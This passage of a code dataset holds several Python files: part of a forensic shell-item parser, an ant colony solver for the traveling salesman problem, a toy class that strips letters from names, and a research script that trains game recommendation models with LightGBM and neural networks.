codepage. The default is cp1252.\n \"\"\"\n self._path_segments = []\n shell_item_list = pyfwsi.item_list()\n shell_item_list.copy_from_byte_stream(byte_stream, ascii_codepage=codepage)\n\n for shell_item in shell_item_list.items:\n self._ParseShellItem(parser_context, shell_item)\n","repo_name":"cvandeplas/plaso","sub_path":"plaso/parsers/shared/shell_items.py","file_name":"shell_items.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"17904132363","text":"\"\"\"\nCode Reference : https://github.com/Akavall/AntColonyOptimization\n\"\"\"\nimport random as rn\nimport numpy as np\nfrom numpy.random import choice as np_choice\nimport random\nimport pandas as pd\nimport operator\nimport time\n\nclass AntColony:\n def __init__(self, distances, n_ants, n_best, n_iterations, decay, alpha=1, beta=1):\n \"\"\"\n Args:\n distances (2D numpy.array): Square matrix of distances. Diagonal is assumed to be np.inf.\n n_ants (int): Number of ants running per iteration\n n_best (int): Number of best ants who deposit pheromone\n n_iteration (int): Number of iterations\n decay (float): Rate it which pheromone decays. The pheromone value is multiplied by decay, so 0.95 will lead to decay, 0.5 to much faster decay.\n alpha (int or float): exponenet on pheromone, higher alpha gives pheromone more weight. Default=1\n beta (int or float): exponent on distance, higher beta give distance more weight. Default=1\n\n Example:\n ant_colony = AntColony(german_distances, 100, 20, 2000, 0.95, alpha=1, beta=2) \n \"\"\"\n self.distances = distances\n self.pheromone = np.ones(self.distances.shape) / len(distances)\n self.all_inds = range(len(distances))\n self.n_ants = n_ants\n self.n_best = n_best\n self.n_iterations = n_iterations\n self.decay = decay\n self.alpha = alpha\n self.beta = beta\n\n \n def run(self):\n shortest_path = None\n all_time_shortest_path = (\"placeholder\", np.inf)\n for i in range(self.n_iterations):\n all_paths = self.gen_all_paths()\n self.spread_pheronome(all_paths, self.n_best, shortest_path=shortest_path)\n shortest_path = min(all_paths, key=lambda x: x[1])\n #print(\"Length of the Shortest path during \"+str(i)+\" iteration is \"+str(shortest_path[1]))\n if shortest_path[1] < all_time_shortest_path[1]:\n all_time_shortest_path = shortest_path \n self.pheromone * self.decay \n return all_time_shortest_path\n\n def spread_pheronome(self, all_paths, n_best, shortest_path):\n sorted_paths = sorted(all_paths, key=lambda x: x[1])\n for path, dist in sorted_paths[:n_best]:\n for move in path:\n self.pheromone[move] += 1.0 / self.distances[move]\n\n def gen_path_dist(self, path):\n total_dist = 0\n for ele in path:\n total_dist += self.distances[ele]\n return total_dist\n\n def gen_all_paths(self):\n all_paths = []\n for i in range(self.n_ants):\n path = self.gen_path(0)\n all_paths.append((path, self.gen_path_dist(path)))\n return all_paths\n\n def gen_path(self, start):\n path = []\n visited = set()\n visited.add(start)\n prev = start\n for i in range(len(self.distances) - 1):\n move = self.pick_move(self.pheromone[prev], self.distances[prev], visited)\n path.append((prev, move))\n prev = move\n visited.add(move)\n path.append((prev, start)) # going back to where we started \n return path\n\n def pick_move(self, pheromone, dist, visited):\n pheromone = np.copy(pheromone)\n pheromone[list(visited)] = 0\n\n row = pheromone ** self.alpha * (( 1.0 / dist) ** self.beta)\n\n norm_row = row / row.sum()\n move = np_choice(self.all_inds, 1, p=norm_row)[0]\n return move\n\n\ndef read_data(data_file):\n df = pd.read_csv(data_file) \n nodes = []\n for i in range(len(df['pairs'])):\n sp = df['pairs'][i].split(' ')\n x = float(sp[1])\n y = float(sp[2])\n nodes.append([x, y])\n return nodes\n\n \ndef eucledian_distance(a, b):\n ret = 0\n for i in range(len(a)):\n ret += (a[i] - b[i]) ** 2\n return ret ** 0.5\n\n\ndef main(data_file):\n start = time.time()\n\n beta = 2\n q0 = 0.95\n alpha = 0.1\n peta = 0.1\n n_ants = 20 #No of Ants\n m_ants = 5\n iterations = 100\n\n nodes = read_data(data_file)\n\n arrs = [[np.inf]*len(nodes)]*len(nodes)\n\n for i in range(len(nodes)):\n for j in range(i+1, len(nodes)):\n arrs[i][j] = eucledian_distance(nodes[i], nodes[j])\n arrs[j][i] = arrs[i][j]\n\n distances = np.array(arrs)\n\n ant_colony = AntColony(distances, n_ants, m_ants, iterations, q0, alpha, beta)\n\n shortest_path = ant_colony.run()\n print('Shortest Path Length', str(shortest_path[1]))\n\n time_lapse = time.time() - start\n print('Time lapsed', time_lapse)\n\nif __name__=='__main__':\n main(data_file)","repo_name":"Shraddha2702/Summer_AI","sub_path":"TravelingSalesman/Algorithms/.ipynb_checkpoints/AntColonyAlgo-checkpoint.py","file_name":"AntColonyAlgo-checkpoint.py","file_ext":"py","file_size_in_byte":4681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"3985351358","text":"class Person:\n def __init__(self, name):\n self.name = name\n\n def __str__(self):\n return self.name\n\n def push_name(self, person):\n person.name = self.name\n\n def attack(self, person):\n name = str(person)\n for _ in str(name):\n if _ in self.name.lower() + self.name.upper():\n name = name.replace(_, '')\n person.name = name\n\n def show_name(self):\n print(f\"Hello, I am {self.name}\")\n\n\nclass Destroyer:\n def __init__(self, chars, replace_chars='#'):\n self.chars = chars\n self.replace_chars = replace_chars\n\n def __call__(self, person):\n name = str(person)\n repl_list = []\n for _ in str(name):\n if _ in self.chars.lower() + self.chars.upper():\n name = name.replace(_, self.replace_chars)\n repl_list.append(f\"'{_.lower()}'\")\n repl_list = list(set(repl_list))\n repl_list.sort()\n print(f\"Destroyed: {', '.join(set(repl_list))} from {name}'s name.\")\n person.name = name\n return person\n\n\nif __name__ == '__main__':\n john = Person(\"John\")\n alberta = Person(\"Alberta\")\n print(john, alberta)\n v_kill = Destroyer(\"aeiou\")\n v_kill(john)\n print(john, alberta)\n alpha_kill = Destroyer(\"\".join(chr(i) for i in range(65, 91)), \"\")\n print(john, alberta)\n alpha_kill(john)\n print(john, alberta)\n alberta.push_name(john)\n print(john, alberta)\n caitlin = Person(\"Caitlin\")\n john.attack(caitlin)\n print(caitlin)\n v_kill(caitlin).show_name()\n alberta.show_name()\n","repo_name":"berson969/InterviewTests","sub_path":"bykov_decision.py","file_name":"bykov_decision.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"38520362131","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 8 11:34:08 2019\n\n@author: gzs13133\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport lightgbm as lgb\nimport matplotlib.pylab as plt\n\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.linear_model import LogisticRegression\n\nimport os \nos.chdir('C://Users//GZS13133//intern//data//data_with_hist')\nimport keras.backend as K\nfrom base_structure import draw\nfrom model import ccBaseModel, ccDINModelwithOneHist, ccdeepFM\nfrom data_process import judge_multi_feature, multi_column_info, one_column_inde_info, train_test_split, \\\n sample_weight_generate, nlp_weight_dict, nlp_wor2vec_dict, gametype_word2evc_list, \\\n train_test_split_all, column_count_bar, data_build\n\n\n'''数据类型\nsn, gametype, label, \nandroid_app: 1001 types, 250 length, sn\nios_app: 1001 types, 8 length, sn\nmobile_model: 1001 types, 20 length, sn \ninterest_gametype: : 24 types, 9 length, sn\ngametype_label: 1000 types, 20 length, game\ngametype_hotrank_by_aid_cnt: 51 types, 1 length, game \ngametype_hotrank_by_uid_cnt: 51 types, 1 length, game\ngametype_id: 127 types, 1 length, same as gametype\n'''\n\n'''建模的两种思路\n1.将有长度的seqence看成是multi-hot编码的特征输入到DIN模型\n2.将有长度的seqence看成是多个hist序列进行attention求和处理 (不可行,因为特征空间不同,可以引入transformer结构)\n(理解成其他不同的历史行为对用户的推荐产生不一样的影响)\n本质上两者的区别在于是否有attention\n'''\n\n\n############ 数据读取\ncolumns = 'sn, gametype, label, android_app, ios_app, mobile_model, \\\ninterest_gametype, gametype_label, gametype_hotrank_by_aid_cnt, \\\ngametype_hotrank_by_uid_cnt, gametype_id'\n\n#data_route = 'temp'\n#data_route = 'temp_05_09'\ndata_route = 'temp_05_22_train'\ndata_all = pd.read_csv(data_route, header=None, sep='\\t', low_memory=False)\ndata_all.columns = columns.split(', ')\n\n#gametype & gametype_id 一致\n#a, b = list(data['gametype'].values),list(data['gametype_id'].values)\n#sum([1*(a[i]==b[i]) for i in range(len(a))])\ndata_all = data_all.iloc[:,:-1]\n \ndata_all = data_all.fillna('-1')\n\ndata_route = 'temp_05_22_test'\ndata_all_1 = pd.read_csv(data_route, header=None, sep='\\t', low_memory=False)\ndata_all_1.columns = columns.split(', ')\ndata_all_1 = data_all_1.iloc[:,:-1]\ndata_all_1 = data_all_1.fillna('-1')\n\ndata_alll = pd.concat([data_all, data_all_1])\ndata, data_in = train_test_split_all(data_alll, test_num=150000)\ndel data_alll, data_all, data_all_1\n#data_all_with_hist = data_all[data_all['interest_gametype'] != '-1']\n#data_all_without_hist = data_all[data_all['interest_gametype'] == '-1']\n\n#data_all = pd.read_csv('C:/Users/GZS13133/intern/data/csv_data/data_train_all.csv', low_memory=False)\n#data_in = pd.read_csv('C:/Users/GZS13133/intern/data/csv_data/data_test_all.csv', low_memory=False)\n\ndata_all = pd.read_csv('temp_hist_0610', low_memory=False)\n\ndata_all.columns = columns.split(', ')\ndata_all = data_all.iloc[:,:-1] \ndata_all = data_all.fillna('-1')\ndata_all = data_all[data_all['gametype'] != -1]\ndata_all_hist = data_all[data_all['interest_gametype'] != '-1']\ndata_all_hist.to_csv('temp_hist_0610', header=True, index=False)\n#train_num = 5000000\n#data_all = data_build(data_all, train_num, app_minus_inclued=False, sep='::')\ncolumn_count_bar(data_all_hist, 'gametype', 'All')\n\ndata = pd.read_csv('temp_train_0610_100w', low_memory=False)\ndata_in = pd.read_csv('temp_test_0610_1w', low_memory=False)\ndata_all = pd.concat([data, data_in])\n\ndata_temp = data_build(data_all, 800000)\ndata, data_in = train_test_split_all(data_temp, test_num=150000)\n#data.to_csv('temp_train_0627_400w', header=True, index=False)\n#data_in.to_csv('temp_test_0627_15w', header=True, index=False)\ndel data_all, data_temp\n\n\n#不同gametype下的1-0比例不一致,需要先进行分析\ndef fun1(x):\n return sum(x==1)/sum(x==0)\ndef fun2(x):\n return sum(x==1)\ndef fun3(x):\n return sum(x==0)\ndef fun4(x):\n return sum(x==1)/len(x)\ndef fun5(x, total=len(data)):\n return len(x)/total\n\ngametype_ratio = data.groupby('gametype').agg({'label':[fun1, fun2, fun3, fun4, fun5]})\ngametype_ratio.columns = ['label_1/0_rate', 'label_1_num', 'label_0_num', 'label_1_ratio', 'gametype_ratio']\n\n#gametype:[pos_ratio, gametype_ratio]\ngametype_rate_dict = {}\nfor i in zip(gametype_ratio.index, gametype_ratio.iloc[:,3].values, gametype_ratio.iloc[:,4].values):\n gametype_rate_dict[i[0]] = [i[1], i[2]]\n\nsample_nums, train_prop = len(data), 0.97\n#data = data_all\n#del data_all\ntrain_num = int(sample_nums)\n#data = data_build(data_all, sample_nums, gametype_rate_dict)\n#data = data_build(data_all_with_hist, sample_nums, app_minus_inclued=False)\n#613229个sn,即用户;48个gametype\n#len(set(list(data['sn'].values))) \n#temp_0 = data.groupby('sn').agg(len)\n\n\n############ 数据预处理\ndef entropy(label):\n \n temp_1 = np.sum([label == 1]) / len(label)\n temp_2 = 1 - temp_1\n entropy = -(temp_1*np.log(temp_1) + temp_2*np.log(temp_2))\n \n return entropy\n\n#max:0.6931471805599453\nentropy(np.array(data['label'].values)) # 0.6197236875877505\ntemp =data.groupby('gametype_hotrank_by_uid_cnt').agg({'label':entropy})\nnp.sum(temp['label'].values)/len(temp) # 0.40144343228980817\ntemp =data.groupby('gametype_hotrank_by_aid_cnt').agg({'label':entropy})\nnp.sum(temp['label'].values)/len(temp) # 0.4163850320997233\n\ngametype_num = len(set(data['gametype']))\n#发现有个含有-1,可以填充;有个9022的,出现了一个子label,即变短了,也可以填充。\ngametype_label_sp = judge_multi_feature(data, 'gametype', 'gametype_label')\n\n###### game的feature_list生成 \n#生成对应的单长度序列(one:gametype_hotrank_by_aid_cnt & gametype_hotrank_by_uid_cnt),作为两个独立的特征\nhotrank_aid_num, hotrank_aid_list, hotrank_aid_dict = one_column_inde_info(data, 'gametype_hotrank_by_aid_cnt')\nhotrank_uid_num, hotrank_uid_list, hotrank_uid_dict = one_column_inde_info(data, 'gametype_hotrank_by_uid_cnt')\n\n#或者多长度序列(multi:gametype_label)\ngametype_label_num, gametype_label_len, gametype_dict, gametype_label_list, gametype_label_dict, _ = multi_column_info(data, 'gametype_label', 'gametype', sep='::')\n\n#nlp特征\nr1 = 'p2'\nr2 = 'dout2'\n\ngametype_nlp_weight_dict = nlp_weight_dict(r1, gametype_dict)\nword2vec = nlp_wor2vec_dict(r2)\n\nword2vec_list = gametype_word2evc_list(gametype_nlp_weight_dict, word2vec, gametype_num+1)\ndel word2vec\n\n###### sn的feature_list生成 \nsn_num = len(set(data['sn']))\n#一致性检查,发现很多sn下对应multi特征并不一样,但是只需要找到其中最长的作为其特征表示即可\nsn_android_app_sp = judge_multi_feature(data, 'sn', 'android_app')\nsn_ios_app_sp = judge_multi_feature(data, 'sn', 'ios_app')\nsn_mobile_model_sp = judge_multi_feature(data, 'sn', 'mobile_model')\nsn_interest_gametype_sp = judge_multi_feature(data, 'sn', 'interest_gametype')\n\nandroid_app_num, android_app_len, sn_dict, android_app_list, android_app_dict, _ = multi_column_info(data, 'android_app', 'sn', sep='::')\nios_app_num, ios_app_len, _, ios_app_list, ios_app_dict, _ = multi_column_info(data, 'ios_app', 'sn', sep='::')\nmobile_model_num, mobile_model_len, _, mobile_model_list, mobile_model_dict, _ = multi_column_info(data, 'mobile_model', 'sn', sep='::')\ninterest_gametype_num, interest_gametype_len, _, interest_gametype_list, interest_gametype_dict, tr_list = multi_column_info(data, 'interest_gametype', 'sn', gametype_dict=gametype_dict, sep='::')\n\n\n###### model输入生成\n### train准备\nsn_list = list(data['sn'].apply(lambda x:sn_dict[x]).values)\ngametype_list = list(data['gametype'].apply(lambda x:gametype_dict[x]).values)\n#以interest作为hist(其他也转化hist备用)\nhist_list = [interest_gametype_list[i] for i in sn_list]\nhist_last_sequence_list = [tr_list[0][i] for i in sn_list]\npos = [tr_list[1][i] for i in sn_list]\nneg = [tr_list[2][i] for i in sn_list]\nandroid_hist_list = [android_app_list[i] for i in sn_list]\nios_hist_list = [ios_app_list[i] for i in sn_list]\nmobile_hist_list = [mobile_model_list[i] for i in sn_list]\n\nlabel = np.array(list(data['label'].values))\n#根据gametype下的gametype比例以及0-1比例设置sample_weight\nsample_weight_gametype_and_label = sample_weight_generate(gametype_rate_dict)\n\nsample_weight = []\nfor i in range(len(data)):\n temp = str(data['gametype'].iloc[i]) + str(data['label'].iloc[i])\n sample_weight.append(sample_weight_gametype_and_label[temp]) \nsample_weight = np.array(sample_weight)\n \n#构造训练集和测试集\ntrain_sample_index, test_sample_index = train_test_split(data, train_num, gametype_rate_dict)\nsample_weight_train = sample_weight[train_sample_index]\n\n# one_hist\n#同分布\nx_all = list(zip(sn_list, gametype_list, hotrank_aid_list, hotrank_uid_list, hist_list))\nx_all = np.array(x_all)\nx_train = x_all[train_sample_index].tolist()\nx_train = [list(i) for i in list(zip(*x_train))]\nx_eval = x_all[test_sample_index].tolist()\nx_eval = [list(i) for i in list(zip(*x_eval))]\ncc_train_sample = [x_train, label[train_sample_index]]\ncc_eval_sample = [x_eval, label[test_sample_index]]\n\n#尽量均衡\neval_bal_nums = 90000\n\n#data_all_1_with_hist = data_all_1[data_all_1['interest_gametype'] != '-1']\n#data_all_1_without_hist = data_all_1[data_all_1['interest_gametype'] == '-1']\n#diff_list = list(set(data_all_1['sn']).difference(set(data['sn']))) \n#in_list = list(set(sn_list))\n#in_index = [i for i in range(len(data_all_1)) if data_all_1['sn'].iloc[i] in in_list] \n#\n#temp_ratio = 1/len(gametype_rate_dict)\n#gametype_rate_dict_balance = {}\n#for i in gametype_rate_dict.keys():\n# gametype_rate_dict_balance[i] = [0.5, temp_ratio]\n# \n#data_in = data_build(data_all_1_with_hist, eval_bal_nums, gametype_rate_dict_balance)\n#del data_all_1, data_all_1_with_hist, data_all_1_without_hist\n\n_, hotrank_aid_list_in, _ = one_column_inde_info(data_in, 'gametype_hotrank_by_aid_cnt', base_dict=hotrank_aid_dict)\n_, hotrank_uid_list_in, _ = one_column_inde_info(data_in, 'gametype_hotrank_by_uid_cnt', base_dict=hotrank_uid_dict)\n_, _, _, gametype_label_list_in, _, _ = multi_column_info(data_in, 'gametype_label', 'gametype', maxlen=gametype_label_len, dict_base=gametype_label_dict)\n\n_, _, sn_dict_in, android_app_list_in,_, _ = multi_column_info(data_in, 'android_app', 'sn', maxlen=android_app_len, dict_base=android_app_dict, sep='::')\n_, _, _, ios_app_list_in, _, _ = multi_column_info(data_in, 'ios_app', 'sn', maxlen=ios_app_len, dict_base=ios_app_dict, sep='::')\n_, _, _, mobile_model_list_in, _, _ = multi_column_info(data_in, 'mobile_model', 'sn', maxlen=mobile_model_len, dict_base=mobile_model_dict, sep='::')\n_, _, _, interest_gametype_list_in, _, tr_list_in = multi_column_info(data_in, 'interest_gametype', 'sn', maxlen=interest_gametype_len, gametype_dict=gametype_dict, sep='::')\n\nsn_list_in = list(data_in['sn'].apply(lambda x:sn_dict[x] if x in sn_dict.keys() else 1).values)\ngametype_list_in = list(data_in['gametype'].apply(lambda x:gametype_dict[x] if x in gametype_dict.keys() else 1).values)\nhist_list_in = [interest_gametype_list_in[sn_dict_in[i]] for i in data_in['sn']]\nhist_last_sequence_list_in = [tr_list_in[0][sn_dict_in[i]] for i in data_in['sn']]\npos_in = [tr_list_in[1][sn_dict_in[i]] for i in data_in['sn']]\nneg_in = [tr_list_in[2][sn_dict_in[i]] for i in data_in['sn']]\n\nlabel_eval = np.array(list(data_in['label'].values))\nlabel_rand = np.zeros(len(label))\nlabel_eval_rand = np.zeros(len(label_eval))\n\n#length = interest_gametype_len*interest_gametype_len\n#auxiliary_index_ltr = np.array([np.tril(np.ones(interest_gametype_len, dtype='int32')) for i in range(len(sn_list))]).reshape((-1, length))\n#auxiliary_index_i = np.array([np.eye(interest_gametype_len, dtype='int32') for i in range(len(sn_list))]).reshape((-1, length))\n#auxiliary_index_ltr_in = np.array([np.tril(np.ones(interest_gametype_len, dtype='int32')) for i in range(len(sn_list_in))]).reshape((-1, length))\n#auxiliary_index_i_in = np.array([np.eye(interest_gametype_len, dtype='int32') for i in range(len(sn_list_in))]).reshape((-1, length))\n\n\nx_train = [sn_list, gametype_list, hotrank_aid_list, hotrank_uid_list, hist_list]\ncc_train_sample = [x_train, label, label_rand]\nx_eval = [sn_list_in, gametype_list_in, hotrank_aid_list_in, hotrank_uid_list_in, hist_list_in]\ncc_eval_sample = [x_eval, label_eval, label_eval_rand]\n\nx_train_tr = [sn_list, gametype_list, hotrank_aid_list, hotrank_uid_list, hist_list, hist_last_sequence_list, pos, neg]\ncc_train_sample_tr = [x_train_tr, label, label_rand]\nx_eval_tr = [sn_list_in, gametype_list_in, hotrank_aid_list_in, hotrank_uid_list_in, hist_list_in, hist_last_sequence_list_in, pos_in, neg_in]\ncc_eval_sample_tr = [x_eval_tr, label_eval, label_eval_rand]\n\n# multi_hist\n#同分布\nx_all_multi = list(zip(sn_list, gametype_list, hotrank_aid_list, hotrank_uid_list, hist_list, android_hist_list, ios_hist_list, mobile_hist_list))\nx_all_multi = np.array(x_all_multi)\nx_train_multi = x_all_multi[train_sample_index].tolist()\nx_train_multi = [list(i) for i in list(zip(*x_train_multi))]\nx_eval_multi = x_all_multi[test_sample_index].tolist()\nx_eval_multi = [list(i) for i in list(zip(*x_eval_multi))]\ncc_train_multi_sample = [x_train_multi, label[train_sample_index]]\ncc_eval_multi_sample = [x_eval_multi, label[test_sample_index]]\n\n#均衡\nx_train_multi = [sn_list, gametype_list, hotrank_aid_list, hotrank_uid_list, hist_list, android_hist_list, ios_hist_list, mobile_hist_list]\ncc_train_multi_sample = [x_train_multi, label]\n\nandroid_hist_list_in = [android_app_list_in[sn_dict_in[i]] for i in data_in['sn']]\nios_hist_list_in = [ios_app_list_in[sn_dict_in[i]] for i in data_in['sn']]\nmobile_hist_list_in = [mobile_model_list_in[sn_dict_in[i]] for i in data_in['sn']]\n\nx_eval_multi = [sn_list_in, gametype_list_in, hotrank_aid_list_in, hotrank_uid_list_in, hist_list_in, android_hist_list_in, ios_hist_list_in, mobile_hist_list_in]\ncc_eval_multi_sample = [x_eval_multi, label_eval]\n\n\n### model参数\n#简单规则:train的分布区预测test\ndef fun1(x):\n return sum(x==1)/len(x)\n\ndata_dict = {}\ntemp = data.groupby('gametype').agg({'label':fun1})\ntemp.columns = ['label_1_ratio']\nfor i in zip(temp.index, temp['label_1_ratio']):\n data_dict[i[0]] = i[1]\n\ny_pred = []\nfor i in data_in['gametype']:\n if i in data_dict.keys():\n y_pred.append(data_dict[i])\n else:\n y_pred.append(0)\n \nroc_auc_score(data_in['label'], y_pred) #0.5779539111727456\n#column_count_bar(data_in, 'gametype', t='test')\n#column_count_bar(data, 'gametype', t='train')\n'''\n###### 绘制对比效果图\n\ni = 0\nfor use_Activa in use_Activas:\n# draw_epoch(cc_DIN_One[i].auc_val, 'One'+use_Activa, batch_size, train_num, record_num, i)\n# draw_epoch(cc_DIN_Multi[i].auc_val, 'Multi'+use_Activa, batch_size, train_num, record_num, i)\n draw(cc_DIN_One[i].auc_val, cc_DIN_Multi[i].auc_val, train_num, batch_size, record_num, use_Activa, i+1) \n i += 1\n\ni = 0 \nOne_Dataframe = []\nMulti_Dataframe = []\nfor use_Activa in use_Activas:\n One_dict = {'epoch_1': cc_DIN_One[i].auc_val_item[0], 'epoch_2': cc_DIN_One[i].auc_val_item[1], 'epoch_3': cc_DIN_One[i].auc_val_item[2]}\n temp_One = pd.DataFrame(One_dict)\n temp_One.index = cc_DIN_One[i].item_val \n One_Dataframe.append(temp_One)\n \n Multi_dict = {'epoch_1': cc_DIN_Multi[i].auc_val_item[0], 'epoch_2': cc_DIN_Multi[i].auc_val_item[1], 'epoch_3': cc_DIN_Multi[i].auc_val_item[2]}\n temp_Multi = pd.DataFrame(Multi_dict)\n temp_Multi.index = cc_DIN_Multi[i].item_val \n Multi_Dataframe.append(temp_Multi)\n \n i += 1\n\n \n############ 数据过多,因此分块进行训练\n#block_size = 10\n#block_num = sample_nums // 10\n#cc_DIN_One_s = []\n#\n#for block in range(1, block_size+1):\n# cc_train_sample_temp = [[i[block_num*(block-1):block_num*block] for i in cc_train_sample[0]], cc_train_sample[1][block_num*(block-1):block_num*block]]\n#\n# if block == 1:\n# ccDIN_s = ccDINModelwithOneHist(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n# android_app_num, ios_app_num, mobile_model_num, \n# android_app_list, ios_app_list, mobile_model_list,\n# gametype_label_num, gametype_label_list, use_Activa='Sigmoid')\n# \n# ccDIN_res_s = ccDIN_s.train_model(cc_train_sample_temp, cc_eval_sample, batch_size, epoch, record_num)\n# cc_DIN_One_s.append(ccDIN_res_s)\n# else:\n# ccDIN_res_s = ccDIN_s.train_model(cc_train_sample_temp, cc_eval_sample, batch_size, epoch, record_num)\n# cc_DIN_One_s.append(ccDIN_res_s)\n\n#val_all = []\n#for res in cc_DIN_One_s:\n# val_all.extend(res.auc_val )\n# \n#import matplotlib.pylab as plt\n#plt.plot(list(range(len(val_all))), val_all)\n#plt.show()\n'''\n\n#gdbt + LR\ndef generate_array(raw_list, l):\n \n res = [0] * (l+2)\n for i in raw_list:\n if i == 0:\n break\n res[i] = 1\n \n return res\n \nhotrank_aid_list_array = np.array(hotrank_aid_list, dtype='int32').reshape(-1, 1)\nhotrank_uid_list_array = np.array(hotrank_uid_list, dtype='int32').reshape(-1, 1)\ngt_array = np.array(gametype_list, dtype='int32').reshape(-1, 1)\ngtl_array = np.array([generate_array(gametype_label_list[i], gametype_label_num) for i in gametype_list], dtype='int32').reshape(-1, gametype_label_num+2)\nhist_array = np.array([generate_array(i, gametype_num) for i in hist_list], dtype='int32').reshape(-1, gametype_num+2)\nandroid_hist_array = np.array([generate_array(i, android_app_num) for i in android_hist_list], dtype='int32').reshape(-1, android_app_num+2)\nios_hist_array = np.array([generate_array(i, ios_app_num) for i in ios_hist_list], dtype='int32').reshape(-1, ios_app_num+2)\nmobile_hist_array = np.array([generate_array(i, mobile_model_num) for i in mobile_hist_list], dtype='int32').reshape(-1, mobile_model_num+2)\ngl_train = np.concatenate((hotrank_aid_list_array, hotrank_uid_list_array, gt_array, gtl_array, hist_array, android_hist_array, ios_hist_array, mobile_hist_array), axis=-1)\n\nhotrank_aid_list_array_eval = np.array(hotrank_aid_list_in, dtype='int32').reshape(-1, 1)\nhotrank_uid_list_array_eval = np.array(hotrank_uid_list_in, dtype='int32').reshape(-1, 1)\ngt_array_eval = np.array(gametype_list_in, dtype='int32').reshape(-1, 1)\ngtl_array_eval = np.array([generate_array(gametype_label_list_in[i], gametype_label_num) for i in gametype_list_in], dtype='int32').reshape(-1, gametype_label_num+2)\nhist_array_eval = np.array([generate_array(i, gametype_num) for i in hist_list_in], dtype='int32').reshape(-1, gametype_num+2)\nandroid_hist_list_in = [android_app_list_in[sn_dict_in[i]] for i in data_in['sn']]\nandroid_hist_array_eval = np.array([generate_array(i, android_app_num) for i in android_hist_list_in], dtype='int32').reshape(-1, android_app_num+2)\nios_hist_list_in = [ios_app_list_in[sn_dict_in[i]] for i in data_in['sn']]\nios_hist_array_eval = np.array([generate_array(i, ios_app_num) for i in ios_hist_list_in], dtype='int32').reshape(-1, ios_app_num+2)\nmobile_hist_list_in = [mobile_model_list_in[sn_dict_in[i]] for i in data_in['sn']]\nmobile_hist_array_eval = np.array([generate_array(i, mobile_model_num) for i in mobile_hist_list_in], dtype='int32').reshape(-1, mobile_model_num+2)\ngl_eval = np.concatenate((hotrank_aid_list_array_eval, hotrank_uid_list_array_eval, gt_array_eval, gtl_array_eval, hist_array_eval, android_hist_array_eval, ios_hist_array_eval, mobile_hist_array_eval), axis=-1)\n\nname = [str(i) for i in range(gl_train.shape[1])]\n\nlgb_train = lgb.Dataset(gl_train, label)\nlgb_eval = lgb.Dataset(gl_eval, label_eval, reference=lgb_train)\n\nparams = {\n 'task': 'train',\n 'boosting_type': 'gbdt',\n 'objective': 'binary',\n 'metric': {'binary_logloss'},\n 'num_leaves': 6,\n 'num_trees': 200,\n 'learning_rate': 0.01,\n 'feature_fraction': 0.9,\n 'bagging_fraction': 0.8,\n 'bagging_freq': 5,\n 'verbose': 0\n}\n\n# number of leaves,will be used in feature transformation\nnum_leaf = 6\n\nprint('Start training...')\n# train\ngbm = lgb.train(params,\n lgb_train,\n num_boost_round=100,\n valid_sets=lgb_train,\n feature_name=name,\n categorical_feature=name)\n\n#print('Save model...')\n## save model to file\n#gbm.save_model('model.txt')\n\nprint('Start predicting...')\n# predict and get data on leaves, training data\ny_pred = gbm.predict(gl_train, pred_leaf=True)\n\nprint(np.array(y_pred).shape)\nprint(y_pred[:10])\n\nprint('Writing transformed training data')\ntransformed_training_matrix = np.zeros([len(y_pred), len(y_pred[0]) * num_leaf], \\\n dtype=np.int64) # N * num_tress * num_leafs\nfor i in range(0, len(y_pred)):\n temp = np.arange(len(y_pred[0])) * num_leaf + np.array(y_pred[i])\n transformed_training_matrix[i][temp] += 1\n\n\ny_pred = gbm.predict(gl_eval, pred_leaf=True)\nprint('Writing transformed testing data')\ntransformed_testing_matrix = np.zeros([len(y_pred), len(y_pred[0]) * num_leaf], dtype=np.int64)\nfor i in range(0, len(y_pred)):\n temp = np.arange(len(y_pred[0])) * num_leaf + np.array(y_pred[i])\n transformed_testing_matrix[i][temp] += 1\n\n\nlm = LogisticRegression(penalty='l2', C=0.05) # logestic model construction\nlm.fit(transformed_training_matrix, label) # fitting the data\ny_pred_test = lm.predict_proba(transformed_testing_matrix) # Give the probabilty on each label\n\neval_auc = roc_auc_score(label_eval, y_pred_test)\nprint(eval_auc)\n\ntemp, batch_size, epoch, record_num, save_path = [], 64, 3, 1000, 'D:\\\\my\\\\netease_data\\\\model'\nos.chdir(save_path)\n\nccbase = ccBaseModel(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len)\nccbase_res = ccbase.train_model(cc_train_sample, cc_eval_sample, batch_size, epoch, record_num)\nccbase.model.save('base_model.h5')\n\nccbase_tr = ccBaseModel(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len,\n weighted=True, use_Transformer=True)\nccbase_tr_res = ccbase_tr.train_model(cc_train_sample_tr, cc_eval_sample_tr, batch_size, epoch, record_num)\nccbase_tr.model.save('basetr_model.h5')\n\nccdin = ccDINModelwithOneHist(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len)\nccdin_res = ccdin.train_model(cc_train_sample, cc_eval_sample, batch_size, epoch, record_num)\nccdin.model.save('din_model.h5')\n\nccdin_tr = 